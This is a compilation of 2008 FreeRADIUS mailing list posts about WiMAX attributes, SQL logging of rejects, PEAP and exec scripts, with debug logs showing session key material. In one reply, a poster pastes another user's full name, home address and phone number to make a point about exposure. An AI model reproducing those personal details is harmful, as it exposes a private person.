Re: WiMAX Auth
mysql> select * from radreply where username = 'kaffi'; +--+--+-++--+ | id | username | attribute | op | value| +--+--+-++--+ | 8614 | kaffi| Filter-ID | = | Default | | 8615 | kaffi| Session-Timeout | = | 3600 | | 8626 | kaffi| WiMAX-MN-NAI| = | %{User-Name} | | 8627 | kaffi| WiMAX-IP-Technology | = | 3| +--+--+-++--+ 4 rows in set (0.00 sec) My dictionary entry: ATTRIBUTE WiMAX-MN-NAI78 string My serverlog: Thu Dec 18 07:47:51 2008 : Info: +- entering group post-auth {...} Thu Dec 18 07:47:51 2008 : Info: [wimax] MIP-RK = 0x9682b6cc9925949cce138e6fd148e9ac21c94c9e552ef2173c3e996aef87bff96f50564a5dcf85a505300a4e319349dce56c5a1f0308e6bb7e29a5f89e0a4949 Thu Dec 18 07:47:51 2008 : Info: [wimax] MIP-SPI = 41f3aefe Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: WiMAX-MN-NAI was not found in the request or in the reply. Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: We cannot calculate MN-HA keys. Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: WiMAX-IP-Technology not found in reply. Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: Not calculating MN-HA keys Thu Dec 18 07:47:51 2008 : Info: ++[wimax] returns updated Thu Dec 18 07:47:51 2008 : Info: ++[exec] returns noop Sending Access-Accept of id 223 to 192.168.106.2 port 1812 Filter-Id = "Default" Session-Timeout = 3600 WiMAX-MN-NAI = "%{User-Name}" WiMAX-IP-Technology = CMIP4 MS-MPPE-Recv-Key = 0x0d8927cde5e7cd69d7b1af9e38e7fb91948e2d4202cbdaa3b2273457423f9e03 MS-MPPE-Send-Key = 0x84eb7dad459a1bbda54348214562953f89220223440dc41d95181167c4cedc95 EAP-Message = 0x03080004 Message-Authenticator = 0x User-Name = "{am=1}155486b1a70ae371e7f2cacc01189ccc" Thu Dec 18 07:47:51 2008 : Info: Finished request 15. Any idea what might be wrong? PS: Changing WiMAX-MN-NAI = "%{User-Name}" to 'kaffi' doesn't make a difference. Sincerely, Kristoffer Milligan On Wed, 2008-12-17 at 22:58 +0100, t...@kalik.net wrote: > >My question is, where do I add these replies? I currently have my radius > >doing its lookups in a MySQL database. > > > > radreply table. > > Ivan Kalik > Kalik Informatika ISP > > - > List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
You are probably the first to want the exact same text. Someone may have wanted to log the reason for the reject, but they probably didn't care about the exact representation of that reason. I just want what FreeRadius is already logging to the text file, I don't want any special custom text for each error, just what's already being logged to the text files. Thanks for your help, I don't think I want to dig that hard to get this solution, I am just surprised that it's this hard. If the info is already being logged to the text file, it must exist in some variable which should allow me to get it and insert the same into the DB. Hmmm.. Either way, if I can't solve this fairly simple, I will probably parse the radiusd.log file with a command line script and insert each line into a table. I do this now with some other logs files, this allows me to then do web based queries against the tables. Regards, Todd Routhier -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of Scott Lambert Sent: Wednesday, December 17, 2008 10:39 PM To: FreeRadius users mailing list Subject: Re: How to log failed auth attempts? On Wed, Dec 17, 2008 at 07:51:48PM -0600, Todd R. wrote: > This seems odd, I can't be the first person to want to have the reason for > the reject in the SQL table?? > > It can't be rocket science to get this to log in the DB when it's already > being logged in the text logs?? You are probably the first to want the exact same text. Someone may have wanted to log the reason for the reject, but they probably didn't care about the exact representation of that reason. If you want this, I suspect that you will need to look at the source code which generates the text for the log module. It may tell you the correct varible to use so you can store the correct reason value in the database. You can then build logic in your reporting logic to show you the text you want. That would likely be more efficient, storage wise, for your database too. It's not rocket science, but it is likely "some assembly required." I am not a FreeRADIUS developer, so this is speculation. -- Scott LambertKC5MLE Unix SysAdmin lamb...@lambertfam.org - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How to log failed auth attempts?
On Wed, Dec 17, 2008 at 07:51:48PM -0600, Todd R. wrote: > This seems odd, I can't be the first person to want to have the reason for > the reject in the SQL table?? > > It can't be rocket science to get this to log in the DB when it's already > being logged in the text logs?? You are probably the first to want the exact same text. Someone may have wanted to log the reason for the reject, but they probably didn't care about the exact representation of that reason. If you want this, I suspect that you will need to look at the source code which generates the text for the log module. It may tell you the correct varible to use so you can store the correct reason value in the database. You can then build logic in your reporting logic to show you the text you want. That would likely be more efficient, storage wise, for your database too. It's not rocket science, but it is likely "some assembly required." I am not a FreeRADIUS developer, so this is speculation. -- Scott LambertKC5MLE Unix SysAdmin lamb...@lambertfam.org - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
Well, it appears that what I had was correct, at least I think so.. Ex. %{reply:Reply-Message} The problem seems to be that when a bad password is the reject reason, the Reply-Message is just blank. On the other hand if I set the account expiration in the past, the Reply-Message contains "Password Has Expired=0D=0A". This seems odd, I can't be the first person to want to have the reason for the reject in the SQL table?? It can't be rocket science to get this to log in the DB when it's already being logged in the text logs?? Thanks for continuing to assist me. Regards, Todd Routhier -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of Todd R. Sent: Wednesday, December 17, 2008 7:24 PM To: 'FreeRadius users mailing list' Subject: RE: How to log failed auth attempts? >What variable can I use to pull the reject reason, is it something like >%{reply:Reply-Message} That is a good choice. I tried this but I just end up with a blank entry in the database. >Am I missing anything else to accomplish this? > You just need to compose text that will go into the Reply-Message. Thing is, I don't want to compose anything, I want to insert the same reject reason that is being displayed in the text error log. I don't have to compose the text to get it to log to the text log, it just happens. I am looking to populate my "rejectreason" field in the radpostauth table with the reason for the reject. I already have "Access-Reject" under the reply field but this isn't very informative and causes me to go dig through the text log to find the reason or the reject. Thanks for any clarification you can provide. Regards, Todd Routhier -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of t...@kalik.net Sent: Wednesday, December 17, 2008 7:08 PM To: FreeRadius users mailing list Subject: RE: How to log failed auth attempts? >I do see this query in sql/mysql/dialup.conf that controls the insert: > >postauth_query = "INSERT INTO ${postauth_table} \ > (username, pass, reply, authdate) \ > VALUES ( \ > '%{User-Name}', \ > '%{%{User-Password}:-%{Chap-Password}}', \ > '%{reply:Packet-Type}', '%S')" > >I am guessing I need to modify this query and the DB schema to suite my >needs. Yes. >What variable can I use to pull the reject reason, is it something like >%{reply:Reply-Message} That is a good choice. >Am I missing anything else to accomplish this? > You just need to compose text that will go into the Reply-Message. >Is there a list of available variables to use doc/variables.txt Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
>What variable can I use to pull the reject reason, is it something like >%{reply:Reply-Message} That is a good choice. I tried this but I just end up with a blank entry in the database. >Am I missing anything else to accomplish this? > You just need to compose text that will go into the Reply-Message. Thing is, I don't want to compose anything, I want to insert the same reject reason that is being displayed in the text error log. I don't have to compose the text to get it to log to the text log, it just happens. I am looking to populate my "rejectreason" field in the radpostauth table with the reason for the reject. I already have "Access-Reject" under the reply field but this isn't very informative and causes me to go dig through the text log to find the reason or the reject. Thanks for any clarification you can provide. Regards, Todd Routhier -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of t...@kalik.net Sent: Wednesday, December 17, 2008 7:08 PM To: FreeRadius users mailing list Subject: RE: How to log failed auth attempts? >I do see this query in sql/mysql/dialup.conf that controls the insert: > >postauth_query = "INSERT INTO ${postauth_table} \ > (username, pass, reply, authdate) \ > VALUES ( \ > '%{User-Name}', \ > '%{%{User-Password}:-%{Chap-Password}}', \ > '%{reply:Packet-Type}', '%S')" > >I am guessing I need to modify this query and the DB schema to suite my >needs. Yes. >What variable can I use to pull the reject reason, is it something like >%{reply:Reply-Message} That is a good choice. >Am I missing anything else to accomplish this? > You just need to compose text that will go into the Reply-Message. >Is there a list of available variables to use doc/variables.txt Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
>I do see this query in sql/mysql/dialup.conf that controls the insert: > >postauth_query = "INSERT INTO ${postauth_table} \ > (username, pass, reply, authdate) \ > VALUES ( \ > '%{User-Name}', \ > '%{%{User-Password}:-%{Chap-Password}}', \ > '%{reply:Packet-Type}', '%S')" > >I am guessing I need to modify this query and the DB schema to suite my >needs. Yes. >What variable can I use to pull the reject reason, is it something like >%{reply:Reply-Message} That is a good choice. >Am I missing anything else to accomplish this? > You just need to compose text that will go into the Reply-Message. >Is there a list of available variables to use doc/variables.txt Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: PEAP with Windows supplicant, Automatically use my windows credentials
>[mschap] expand: >--username=%{Stripped-User-Name:-%{User-Name:-%{mschap:User-Name}}} -> >--username=administrator >[mschap] mschap2: 94 >[mschap] expand: --challenge=%{mschap:Challenge:-00} -> >--challenge=c92aee56ea24cca3 >[mschap] expand: --nt-response=%{mschap:NT-Response:-00} -> >--nt-response=edfe77fdefdc346cfcb795de77c1bfb7e882075da213a532 >Exec-Program output: NT_KEY: 0B31E07CE9C3855E7B73F3A94ED21EB5 >Exec-Program-Wait: plaintext: NT_KEY: 0B31E07CE9C3855E7B73F3A94ED21EB5 >Exec-Program: returned: 0 >[mschap] adding MS-CHAPv2 MPPE keys >++[mschap] returns ok >MSCHAP Success Password is different. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
I do see this query in sql/mysql/dialup.conf that controls the insert: postauth_query = "INSERT INTO ${postauth_table} \ (username, pass, reply, authdate) \ VALUES ( \ '%{User-Name}', \ '%{%{User-Password}:-%{Chap-Password}}', \ '%{reply:Packet-Type}', '%S')" I am guessing I need to modify this query and the DB schema to suite my needs. What variable can I use to pull the reject reason, is it something like %{reply:Reply-Message}? Am I missing anything else to accomplish this? Is there a list of available variables to use in this situations and what they mean? Thanks again! Regards, Todd Routhier -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of Todd R. Sent: Wednesday, December 17, 2008 2:15 PM To: 'FreeRadius users mailing list' Subject: RE: How to log failed auth attempts? Alan, Thanks for your response.. First, I can't believe I missed this section of the radiusd.conf file, I looked, really I did :) I also noticed that it said that many things are logged when running "radiusd -X" which explains some other things.. I made some changes and now I have sufficient log info in the text files. Hate to push my luck here but I would love to expand what is being logged SQL wise in my MySql db. Right now, I have something like this logging on a failed attempt in the MySQL DB within the radpostauth table: id, username, pass, reply, authdate 41, d...@somerealm.com, mypass, Access-Accept, 2008-12-17 13:09:15 What I would like to see is something like this: id, username, pass, reply, reply-message, authdate 41, d...@somerealm.com, mybadpass, Access-Accept, Login incorrect (rlm_pap: CLEAR TEXT password check failed), 2008-12-17 13:09:15 Any help with this would be appreciated. Regards, Todd R. -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of Alan DeKok Sent: Wednesday, December 17, 2008 5:32 AM To: FreeRadius users mailing list Subject: Re: How to log failed auth attempts? Todd R. wrote: > It seems that most things I have read suggest that failed authentication > attempts are logged to the radius.log by default but they do not show up for > me. Edit raddb/radiusd.conf, and read the "log" section. It has configuration entries that control this behavior. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Duplicate IPs for Radius Clients with different secrets -allow any client IP?
t...@kalik.net wrote: What could a hacker do to the server if he can't even get passed returning a correct shared secret? Get the usernames and passwords of your users and gain access to your network at will. Publish them and let anybody use your network. Internet for free. Sounds great. Here's one example, is this you? Geier, Eric m...@egeier.com 297 Marchmont Drive Fairborn, Ohio 45324 United States +1.9372600286 First Google hit: http://www.informit.com/authors/bio.aspx?a=AFEDE263-5156-4C97-AD8E-5E4473511557 Interesting list of books on your site. "Say I did open up to any IP, the AP's MAC must match one from my list; moreover the hacker must have the shared secret. Plus if I can add to the example SQL statement, I would add to the WHERE clause "and domain =(domain pulled from what's after the username's @ sign). Then the hacker must know a username and domain that matches an acceptable AP, the user's password, that acceptable AP's MAC address, and then finally the shared secret for the AP. " So, because a lot of hurdles are put in front of someone that should stop them? If so, I would never be where I am today. All that does is challenges your adversaries intellect, and let us face reality a bit, the ones that knows what they do would take that challenge on any day. Put a carrot in front of a donkey, and it'll get eaten. Put a lot of carrots in front of the donkey and they'll still get eaten, it'll just take slightly longer. I can't see how putting your authentication and authorization system in the wild will help you, other than saving a buck on setting up VPNs between your sites. Which can also be done cheaply if cost is the motivator. Don't put an infrastructure piece like this sit in the open if you use it for your internal purposes. Wouldn't you agree? //anders - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: PEAP with Windows supplicant, Automatically use my windows credentials
>I've configured a PEAP with the Windows SP3 supplicant with freeradius 2.1.3, >and the authentication succeeds when "Automatically use my windows logon name >and password (and domain if any)" is unselected, which forces a manual logon. >However, when "Automatically use my ..." is selected with the same user >name/domain, the authentication fails. How same is "the same user name/domain"? Post the debug of the good attempt. Please use radiusd -X. We don't need to see "Wed Dec 17 09:07:24 2008 : Debug:" in front of every line. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: WiMAX Auth
>My question is, where do I add these replies? I currently have my radius >doing its lookups in a MySQL database. > radreply table. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Conf PEAP
>I am configuring PEAP and there is not much information about it, > Maily because there is nothing to configure. It "just works" with default configuration. >Should I add a user in the user file alone? That's best for testing - user entry at the top of the users file. > >If default is configured with EAP, what should I modify another file? > Nothing. >[peap] <<< TLS 1.0 Alert [length 0002], fatal unknown_ca >TLS Alert read:fatal:unknown CA >TLS_accept:failed in SSLv3 read client certificate A But your problem has nothing to do with the user. You haven't imported the ca certificate onto the users machine. At least not the correct one. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Basic question on rlm_perl
hi, I am building freeradius 2.1.3 on ubuntu (configure/make/make install) I am trying to use perl module, but when I can't start my server. I have put "perl" as a module in my radiusd.conf file. I don't file the rlm_perl*.so file in /usr/local/lib/ where all the other rlm_*.so files are located. What am I missing? I also tried to configure with the experimental modules flag. Thanks -a - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: external script reply
>Exec-Program output: Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802 >Tunnel-Private-Group-Id = vlan20 That didn't come out well. It should look like the reply list in users file: reply1, reply2, reply3 Try adding ",\n" between attributes. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: WISPr-Bandwidth question
Thanks, Leigh... Yes, that does make more sense. How you explained it. So basically, I would need to put a NAC (network access controller) at each remote location. BUT... I wouldn't necessarily have to put a "traditional" captive portal at each location, even though they would probably provide pretty much the same features. thx... Kevin On Wed, 2008-12-17 at 12:49 -0500, Leigh Martell wrote: > Hello Kevin, > > I can't answer definitively, but I would assume that it would be done > on your NAS(depending on your hardware these rules "could" be > propagated to the child devices). It would defy all logic for it to be > done on the clie nt, Just as you would in an unauthenticated > wired/wireless network it is always best to control traffic at the > distribution point. > > Hope that helps. > > Take Care, > Leigh Martell > > On Wed, Dec 17, 2008 at 12:14 PM, kevin wrote: > While an "out of the box" solution is where I'll probably end > up, I'm > battling with myself over the idea of how to best manage > bandwidth on a > network including multiple remote locations, with both wired > and > wireless connections. > > I'm moving to using freeradius to authenticate (which > ultimately will be > done by MAC for initial ease of setup) but I'm trying to > figure out > where the Bandwidth attributes actually are used. > > IOW, when using WISPr-Bandwidth, does that modify the client > connection > at the client computer or does that occur at a proxy or > firewall device? > What I'm getting at is, is a captive portal necessary or can a > person > simply have client authentication via freeradius and the > client network > card handle managing its own bandwidth? And if so, is there > any > possibility that the client computer could be modified by > someone with a > bit of skill to bypass those controls? > > Hope that made sense. > > Cheers, > > Kevin > > > - > List info/subscribe/unsubscribe? See > http://www.freeradius.org/list/users.html > > - > List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: Duplicate IPs for Radius Clients with different secrets -allow any client IP?
>What could a hacker do to the server if he can't even get passed returning a >correct shared secret? Get the usernames and passwords of your users and gain access to your network at will. Publish them and let anybody use your network. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: WISPr-Bandwidth question
>IOW, when using WISPr-Bandwidth, does that modify the client connection >at the client computer or does that occur at a proxy or firewall device? When you use bandwidth control attributes they are used by your NAS (AP, router, switch, captive portal ...). You should read NAS documentation to find the most approprite one for you (wired connection is hardly going to use WISPr attributes). Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: Duplicate IPs for Radius Clients with different secrets - allow any client IP?
Thanks for the info, Anders. Yes, I'm considering security issues. Just would be really great if I could make everything work as I want...with still being secure. > Why bother doing the SQL stuff, if you're going to let anyone use your service anyway? The way I thought it up, it would allow any IP to TRY to run its request to the server...whereas if real client IPs are given, requests are denied before the sever does any work if the client IP isn't on the list. Say I did open up to any IP, the AP's MAC must match one from my list; moreover the hacker must have the shared secret. Plus if I can add to the example SQL statement, I would add to the WHERE clause "and domain =(domain pulled from what's after the username's @ sign). Then the hacker must know a username and domain that matches an acceptable AP, the user's password, that acceptable AP's MAC address, and then finally the shared secret for the AP. What could a hacker do to the server if he can't even get passed returning a correct shared secret? cause DoS attacks? If so, I can try to find something that blocks requests from originating IPs for 5mins after so many requests. What do you think? Thanks for your input, Eric From: freeradius-users-bounces+me=egeier@lists.freeradius.org [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On Behalf Of Anders Holm Sent: Wednesday, December 17, 2008 2:55 PM To: FreeRadius users mailing list Subject: Re: Duplicate IPs for Radius Clients with different secrets - allow any client IP? Eric Geier wrote: Thank you for the info, David. I think the following is an example of how this could work, which I googled: client 212.37.57.2 { secret = "%{sql:SELECT secret FROM accesspoints WHERE id = %{raw:NAS-Identifier}}" shortname = "just one of our example networks" } I'm thinking I could even just have one client entry like this...but set to allow any IP. Is that possible? clients.conf client 0.0.0.0/0, shared secret = "open" ... Why bother doing the SQL stuff, if you're going to let anyone use your service anyway? Think about it ... clients.conf controls which APs/NAS' are allowed to send you stuff to process. If your intention is to open it for anyone that can reach your service, why then do the above? The end clients are not what will send you requests, the APs are ... I think you've missed the point of the IP addressing for the end clients versus how you wish to handle the APs ... And for a service which allows or denies access for your internal users, I wouldn't personally allow anyone from the outside world even get close to that service. You want to understand basic networking and security considerations before seriously contemplating this. Start looking at getting a VPN solution between your offices, or simply just put one FreeRADIUS box in each office. Continue on this path and fairly soon someone will have found your wireless setup and the service which allows clients to authenticate sitting out in the open. You might as well not have anything in place at all then... //anders This would prevent me from having to track Internet IP changes among the multiple offices and locations where these separate WPA-Enterprise networks will be located at. Thanks! Eric -Original Message- From: freeradius-users-bounces+me=egeier@lists.freeradius.org [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On Behalf Of wlanmac Sent: Wednesday, December 17, 2008 8:42 AM To: freeradius-users@lists.freeradius.org Subject: Re: Duplicate IPs for Radius Clients with different secrets It's easy! Just google for rlm_raw and use it with a SQL xlat rule to pick out the shared secret from a database. I have been doing this way for years... in FreeRADIUS v1 and v2. David coova.org Date: Wed, 17 Dec 2008 10:16:17 +0200 From: Johan Meiring Subject: Re: Duplicate IPs for Radius Clients with different secrets To: FreeRadius users mailing list Message-ID: <4948b551.6030...@pcservices.co.za> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Eric Geier wrote: If I understand what you said, I would only need one IP entry (the Internet IP) in the config file for each location, right? Most of these locations will be using dynamic Internet IPs; I'm not sure how'd I keep the config updated. Plus this would make each location/network use the same shared secret among all their APs, which I want to prevent. Alan, The Nas-Identifier being available to dynamic clients will also solve Eric's problem. Any update on when it might be available? Thanks! No virus found in this incoming message. Checked by AVG - http://www.avg.com Version: 8.0.176 / Virus Database: 270.9.19/1853 - Release Date: 12/17/2008 8:31 AM - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
Alan, Thanks for your response.. First, I can't believe I missed this section of the radiusd.conf file, I looked, really I did :) I also noticed that it said that many things are logged when running "radiusd -X" which explains some other things.. I made some changes and now I have sufficient log info in the text files. Hate to push my luck here but I would love to expand what is being logged SQL wise in my MySql db. Right now, I have something like this logging on a failed attempt in the MySQL DB within the radpostauth table: id, username, pass, reply, authdate 41, d...@somerealm.com, mypass, Access-Accept, 2008-12-17 13:09:15 What I would like to see is something like this: id, username, pass, reply, reply-message, authdate 41, d...@somerealm.com, mybadpass, Access-Accept, Login incorrect (rlm_pap: CLEAR TEXT password check failed), 2008-12-17 13:09:15 Any help with this would be appreciated. Regards, Todd R. -Original Message- From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius. org] On Behalf Of Alan DeKok Sent: Wednesday, December 17, 2008 5:32 AM To: FreeRadius users mailing list Subject: Re: How to log failed auth attempts? Todd R. wrote: > It seems that most things I have read suggest that failed authentication > attempts are logged to the radius.log by default but they do not show up for > me. Edit raddb/radiusd.conf, and read the "log" section. It has configuration entries that control this behavior. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Duplicate IPs for Radius Clients with different secrets - allow any client IP?
Eric Geier wrote: Thank you for the info, David. I think the following is an example of how this could work, which I googled: client 212.37.57.2 { secret = "%{sql:SELECT secret FROM accesspoints WHERE id = %{raw:NAS-Identifier}}" shortname = "just one of our example networks" } I'm thinking I could even just have one client entry like this...but set to allow any IP. Is that possible? clients.conf client 0.0.0.0/0, shared secret = "open" ... Why bother doing the SQL stuff, if you're going to let anyone use your service anyway? Think about it ... clients.conf controls which APs/NAS' are allowed to send you stuff to process. If your intention is to open it for anyone that can reach your service, why then do the above? The end clients are not what will send you requests, the APs are ... I think you've missed the point of the IP addressing for the end clients versus how you wish to handle the APs ... And for a service which allows or denies access for your internal users, I wouldn't personally allow anyone from the outside world even get close to that service. You want to understand basic networking and security considerations before seriously contemplating this. Start looking at getting a VPN solution between your offices, or simply just put one FreeRADIUS box in each office. Continue on this path and fairly soon someone will have found your wireless setup and the service which allows clients to authenticate sitting out in the open. You might as well not have anything in place at all then... //anders This would prevent me from having to track Internet IP changes among the multiple offices and locations where these separate WPA-Enterprise networks will be located at. Thanks! Eric -Original Message- From: freeradius-users-bounces+me=egeier@lists.freeradius.org [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On Behalf Of wlanmac Sent: Wednesday, December 17, 2008 8:42 AM To: freeradius-users@lists.freeradius.org Subject: Re: Duplicate IPs for Radius Clients with different secrets It's easy! Just google for rlm_raw and use it with a SQL xlat rule to pick out the shared secret from a database. I have been doing this way for years... in FreeRADIUS v1 and v2. David coova.org Date: Wed, 17 Dec 2008 10:16:17 +0200 From: Johan Meiring Subject: Re: Duplicate IPs for Radius Clients with different secrets To: FreeRadius users mailing list Message-ID: <4948b551.6030...@pcservices.co.za> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Eric Geier wrote: If I understand what you said, I would only need one IP entry (the Internet IP) in the config file for each location, right? Most of these locations will be using dynamic Internet IPs; I'm not sure how'd I keep the config updated. Plus this would make each location/network use the same shared secret among all their APs, which I want to prevent. Alan, The Nas-Identifier being available to dynamic clients will also solve Eric's problem. Any update on when it might be available? Thanks! - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: external script reply
Hi, i don't know why but dosen't work, i post here my config and debug: --- when I try php-cli, my php file works fine: r...@ubuntu# ./getvlan.php Hege Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802 Tunnel-Private-Group-Id = vlan20 -- the exec modul: exec { // is this part important? wait = no input_pairs = request shell_escape = yes output = none } exec get-vlan{ wait = yes program = "/usr/local/etc/raddb/scripts/getvlan.php %{mschap:User-Name}" input-pairs = request output-pairs = reply packet-type = Access-Accept #shell-escape = yes } my get-vlan "modul" is in the post-auth section here is the debug: +- entering group post-auth {...} [get-vlan] expand: %{mschap:User-Name} -> Hege Exec-Program output: Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802 Tunnel-Private-Group-Id = vlan20 Exec-Program-Wait: plaintext: Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802 Tunnel-Private-Group-Id = vlan20 Exec-Program: returned: 0 ++[get-vlan] returns ok } # server inner-tunnel [peap] Got tunneled reply code 2 EAP-Message = 0x03090004 Message-Authenticator = 0x User-Name = "TEST\\Hege" [peap] Got tunneled reply RADIUS code 2 EAP-Message = 0x03090004 Message-Authenticator = 0x User-Name = "TEST\\Hege" [peap] Tunneled authentication was successful. [peap] SUCCESS [peap] Saving tunneled attributes for later what is wrong? thank you, Gabor t...@kalik.net írta: I use external php script to get informations from the ldap. exec getdata { program = .../sg.php %{User-Name} ..?.. } post-auth { getdata } in the php script I do an ldap query with the argument, and take the important data (three word) into variables. How can I take this 3 data back to the Tunnel-Type, Tunnel-Medium-type and Tunnel-Private-Group-Id items of the freeRadius. Print them out (echo). One per line. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Conf PEAP
Hello gentlemen I am configuring PEAP and there is not much information about it, Should I add a user in the user file alone? If default is configured with EAP, what should I modify another file? thanks. logout: rad_recv: Access-Request packet from host 10.10.1.21 port 1645, id=220, length=156 User-Name = "DOMINIO\\msilvero" Framed-MTU = 1400 Called-Station-Id = "0019.2fdb.9e00" Calling-Station-Id = "001f.3c22.44c5" Service-Type = Login-User Message-Authenticator = 0x8cc6da388d8df7f5ec4355457fe64969 EAP-Message = 0x020100130149504c414e5c6d73696c7665726f NAS-Port-Type = Wireless-802.11 NAS-Port = 474 NAS-IP-Address = 10.10.1.21 NAS-Identifier = "ap-ap" +- entering group authorize {...} ++[preprocess] returns ok ++[chap] returns noop ++[mschap] returns noop [suffix] No '@' in User-Name = "DOMINIO\msilvero", looking up realm NULL [suffix] No such realm "NULL" ++[suffix] returns noop [eap] EAP packet type response id 1 length 19 [eap] No EAP Start, assuming it's an on-going EAP conversation ++[eap] returns updated ++[unix] returns notfound ++[files] returns noop ++[expiration] returns noop ++[logintime] returns noop [pap] WARNING! No "known good" password found for the user. Authentication may fail because of this. ++[pap] returns noop Found Auth-Type = EAP +- entering group authenticate {...} [eap] EAP Identity [eap] processing type tls [tls] Initiate [tls] Start returned 1 ++[eap] returns handled Sending Access-Challenge of id 220 to 10.10.1.21 port 1645 EAP-Message = 0x010200061920 Message-Authenticator = 0x State = 0x34d23a2734d023bc90d78d0fbe96492c Finished request 0. Going to the next request Waking up in 4.9 seconds. rad_recv: Access-Request packet from host 10.10.1.21 port 1645, id=221, length=263 User-Name = "DOMINIO\\msilvero" Framed-MTU = 1400 Called-Station-Id = "0019.2fdb.9e00" Calling-Station-Id = "001f.3c22.44c5" Service-Type = Login-User Message-Authenticator = 0x3491a2750461cd5efdc8648bf46aa49a EAP-Message = 0x0202006c19001603010061015d030149493f85acfcc0f2c2c47fe6fa7a57d6e421cff26116506231b3776199ed10e23600390038003500160013000a00330032002f0007006600050004006300620061001500120009006500640060001400110008000600030100 NAS-Port-Type = Wireless-802.11 NAS-Port = 474 State = 0x34d23a2734d023bc90d78d0fbe96492c NAS-IP-Address = 10.10.1.21 NAS-Identifier = "ap-ap" +- entering group authorize {...} ++[preprocess] returns ok ++[chap] returns noop ++[mschap] returns noop [suffix] No '@' in User-Name = "DOMINIO\msilvero", looking up realm NULL [suffix] No such realm "NULL" ++[suffix] returns noop [eap] EAP packet type response id 2 length 108 [eap] Continuing tunnel setup. ++[eap] returns ok Found Auth-Type = EAP +- entering group authenticate {...} [eap] Request found, released from the list [eap] EAP/peap [eap] processing type peap [peap] processing EAP-TLS [peap] eaptls_verify returned 7 [peap] Done initial handshake [peap] (other): before/accept initialization [peap] TLS_accept: before/accept initialization [peap] <<< TLS 1.0 Handshake [length 0061], ClientHello [peap] TLS_accept: SSLv3 read client hello A [peap] >>> TLS 1.0 Handshake [length 002a], ServerHello [peap] TLS_accept: SSLv3 write server hello A [peap] >>> TLS 1.0 Handshake [length 085e], Certificate [peap] TLS_accept: SSLv3 write certificate A [peap] >>> TLS 1.0 Handshake [length 020d], ServerKeyExchange [peap] TLS_accept: SSLv3 write key exchange A [peap] >>> TLS 1.0 Handshake [length 0004], ServerHelloDone [peap] 